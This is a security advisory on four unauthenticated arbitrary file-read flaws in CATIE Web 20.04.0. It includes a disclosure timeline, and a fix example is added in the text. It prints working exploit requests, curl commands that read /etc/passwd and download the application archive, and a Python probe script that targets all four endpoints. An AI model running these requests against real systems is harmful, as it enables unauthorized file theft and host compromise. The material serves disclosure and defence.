CATIE WEB ADVISORY SUMMARY
The following document describes identified vulnerabilities in the CATIE Web application version 20.04.0.
Product Vendor
Status Solutions
Product Description
According to the official product documentation, CATIE Web is “a communication, self-service and resident engagement software that helps seniors connect with their community” while also “keeping staff informed about residents’ needs on a daily basis.” The product’s official website is https://www.statussolutions.com/resident-engagement-catie. The latest version of the application is 21.06.0.
Vulnerabilities List
Four local file disclosure vulnerabilities were identified within the CATIE Web application. These vulnerabilities are described in the following sections.
Affected Version
Version 20.04.0
Summary of Findings
CATIE Web version 20.04.0 contains four local file disclosure vulnerabilities that allow an unauthenticated remote attacker to read arbitrary files through four separate application endpoints.
High-Risk Impact
An attacker could leverage these vulnerabilities to read or download any file on the host, as the vulnerable service has root privileges. Accessible files may include application source code, password hashes, and cleartext secrets in configuration files. With this level of access, an attacker could likely gain access to the application and eventually compromise the host.
Solution
As of this writing, the vulnerabilities described have not been remediated.
VULNERABILITIES
LOCAL FILE DISCLOSURE
The CATIE Web application was affected by four local file disclosure vulnerabilities in four of its endpoints. Because the vulnerable service was running as root, any file on the file system could be read, and the vulnerabilities could be exploited remotely without authentication.
Vulnerability details
CVE ID | Security Risk | Impact | Access Vector
N/A | High | Information Disclosure | Remote
The assessment team used the /catie/MultiPartUtilityServlet API endpoint to craft a request and successfully retrieved the /etc/passwd file, as shown below:
Request
GET /catie/MultiPartUtilityServlet?file=/passwd&dir=/etc HTTP/1.1
Host: [REDACTED]
...omitted for brevity...
Response
HTTP/1.1 200 200
...omitted for brevity...
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Demo:x:500:500::/home/Demo:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
support:x:501:501::/home/support:/bin/bash
ladmin:x:502:502::/home/ladmin:/bin/bash
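The request above passes a directory and a file name that the servlet joins into a filesystem path without checking that the result stays under an intended document root. The following Python example is added here to illustrate that pattern and a containment check that rejects it; it is not the vendor's code (the advisory does not reproduce the servlet source), and the document root, file names and symlink in it are constructed for the demonstration.

```python
"""Added illustration of the dir+file concatenation behind the CATIE findings
and a containment check that rejects the advisory's request parameters.
Not the vendor's code; the servlet source is not reproduced in the advisory."""
import os
import posixpath
import tempfile


def vulnerable_resolve(directory, filename):
    """Unchecked join of the request's dir and file parameters.
    Emulates java.io.File(dir, file), which treats a child with a leading
    '/' as relative to the parent, so dir=/etc&file=/passwd -> /etc/passwd."""
    return posixpath.normpath(posixpath.join(directory, filename.lstrip("/")))


def safe_resolve(base, directory, filename):
    """Resolve base/directory/filename and return it only if it stays inside
    base. Returns None for absolute components, '..' escapes, and symlinks
    inside base that point outside it."""
    if os.path.isabs(directory) or os.path.isabs(filename):
        return None  # absolute components are never legitimate in these parameters
    root = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(root, directory, filename))
    # commonpath rather than startswith: '/srv/catie2' must not pass as inside '/srv/catie'
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def run_demo():
    """Exercise both resolvers against the advisory's parameters, a '..'
    traversal and a planted symlink, inside a throwaway document root
    (hypothetical root '/srv/catie' is assumed for the absolute-path case)."""
    results = {}
    results["vuln_etc_passwd"] = vulnerable_resolve("/etc", "/passwd")
    results["safe_etc_passwd"] = safe_resolve("/srv/catie", "/etc", "/passwd")
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "images"))
        legit = os.path.join(base, "images", "logo.png")
        with open(legit, "w") as fh:
            fh.write("constructed sample file\n")
        results["safe_legit"] = safe_resolve(base, "images", "logo.png") == os.path.realpath(legit)
        results["safe_traversal"] = safe_resolve(base, "images", "../../../../etc/passwd")
        results["vuln_traversal"] = vulnerable_resolve(
            os.path.join(base, "images"), "../" * 10 + "etc/passwd")
        # symlink planted inside the root that points outside it
        link = os.path.join(base, "images", "escape")
        try:
            os.symlink("/etc", link)
            results["safe_symlink"] = safe_resolve(base, "images/escape", "passwd")
        except OSError:
            results["safe_symlink"] = None  # platform without symlink support
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The absolute-path rejection is what stops the exact request in the advisory; the realpath plus commonpath check is what stops the `../` and symlink variants that an absolute-path check alone would miss.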
The vulnerable service was running as root, and the team identified the location of the catie.war web application deployment file via the root user’s .bash_history file, downloaded it using the arbitrary file read, and extracted the file to access the source code:
$ curl -sk 'https://[REDACTED]/catie/MultiPartUtilityServlet?file=catie.war&dir=/home/apache-tomcat/webapps/' --output catie.war
$ unzip catie.war
...omitted for brevity...
$ ls
admin appadmin catie.war device global META-INF sara WEB-INF
The team performed a cursory code review of the application and identified three additional arbitrary file read vulnerabilities, reachable with the following requests:
$ curl -sk 'https://[REDACTED]/catie/ImageGrabberServlet?imageName=/passwd&imageDir=/etc'
$ curl -sk 'https://[REDACTED]/catie/AudioStream?file=/etc/passwd'
$ curl -sk 'https://[REDACTED]/catie/device/carousel/tv/Filewriter?filename=/etc/passwd'
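To check an installation for all four endpoints in one pass, the following Python script is added here (it is not part of the advisory or the vendor's software). It builds the four probe requests from the endpoints and parameter names listed above and fingerprints a response body as a disclosed /etc/passwd rather than an error page. The sample responses are constructed (the disclosed one is an excerpt of the response shown in the advisory); the base URL is a placeholder.

```python
"""Added example: build and evaluate the four CATIE Web file-read probes.
Endpoints and parameter names are taken from the advisory; sample bodies
are constructed for offline use."""
import re
import ssl
import urllib.error
import urllib.request
from urllib.parse import urlencode, urljoin

# (name, path, query parameters) for the four vulnerable endpoints
PROBES = (
    ("MultiPartUtilityServlet", "/catie/MultiPartUtilityServlet",
     {"file": "/passwd", "dir": "/etc"}),
    ("ImageGrabberServlet", "/catie/ImageGrabberServlet",
     {"imageName": "/passwd", "imageDir": "/etc"}),
    ("AudioStream", "/catie/AudioStream", {"file": "/etc/passwd"}),
    ("Filewriter", "/catie/device/carousel/tv/Filewriter",
     {"filename": "/etc/passwd"}),
)

# one well-formed passwd(5) record: 7 colon-separated fields, numeric uid/gid
PASSWD_LINE = re.compile(
    r"^[A-Za-z_][\w.-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M)


def build_probe_urls(base_url):
    """Return {endpoint name: probe URL} for base_url (e.g. https://host/)."""
    return {name: urljoin(base_url, path) + "?" + urlencode(params, safe="/")
            for name, path, params in PROBES}


def looks_like_passwd(body):
    """True if body carries a uid 0 root entry plus at least one more
    well-formed passwd line, i.e. the real file rather than an error page."""
    has_root = re.search(r"^root:[^:\n]*:0:0:", body, re.M) is not None
    return has_root and len(PASSWD_LINE.findall(body)) >= 2


def assess(responses):
    """responses: {endpoint name: body}. Returns the sorted names whose
    body disclosed /etc/passwd."""
    return sorted(name for name, body in responses.items() if looks_like_passwd(body))


def fetch_and_assess(base_url, timeout=10):
    """Network variant: fetch each probe with TLS verification disabled
    (the advisory used curl -sk) and report the disclosing endpoints."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    bodies = {}
    for name, url in build_probe_urls(base_url).items():
        try:
            with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
                bodies[name] = resp.read().decode("utf-8", "replace")
        except (urllib.error.URLError, OSError):
            bodies[name] = ""  # unreachable or errored endpoints count as not disclosing
    return assess(bodies)


# constructed sample bodies: an excerpt of the advisory's response, and a
# generic Tomcat-style error page that must not be mistaken for a disclosure
SAMPLE_DISCLOSED = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "bin:x:1:1:bin:/bin:/sbin/nologin\n"
    "apache:x:48:48:Apache:/var/www:/sbin/nologin\n"
)
SAMPLE_ERROR = "<!doctype html><html><body><h1>HTTP Status 404 - Not Found</h1></body></html>"


def demo():
    """Offline run of assess() over constructed responses."""
    responses = {
        "MultiPartUtilityServlet": SAMPLE_DISCLOSED,
        "ImageGrabberServlet": SAMPLE_ERROR,
        "AudioStream": SAMPLE_DISCLOSED,
        "Filewriter": "",
    }
    return assess(responses)


if __name__ == "__main__":
    for name, url in build_probe_urls("https://[REDACTED]/").items():
        print(name, url)
    print("disclosing endpoints in constructed sample:", demo())
```

Against a live host, call `fetch_and_assess("https://host/")` on a system you are authorized to test; the fingerprint deliberately requires a uid 0 root entry and a second well-formed record so that a 200 response carrying an HTML error page is not reported as a disclosure.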
Credits
- Nate Robb, Adversarial Operator, Bishop Fox ([email protected])
- Dan Ritter, Adversarial Operator, Bishop Fox ([email protected])
Timeline
- 04/12/2021: Initial vulnerability discovery
- 04/28/2021: Initial attempted contact with vendor via email, no response
- 04/30/2021: Second attempted contact with vendor via email, no response
- 05/06/2021: Messaged Status Solutions Facebook account to inquire about a security contact for disclosure, no response
- 05/27/2021: Called number listed on Status Solutions website (866-846-7272), received voice mailbox
- 06/02/2021: Emailed technical manager in charge of CATIE Web directly, no response
- 06/09/2021: Sent second email to technical manager in charge of CATIE Web directly, no response
- 08/25/2021: Spoke to lead developer via phone, sent PoC details in email
- 12/02/2021: Advisory published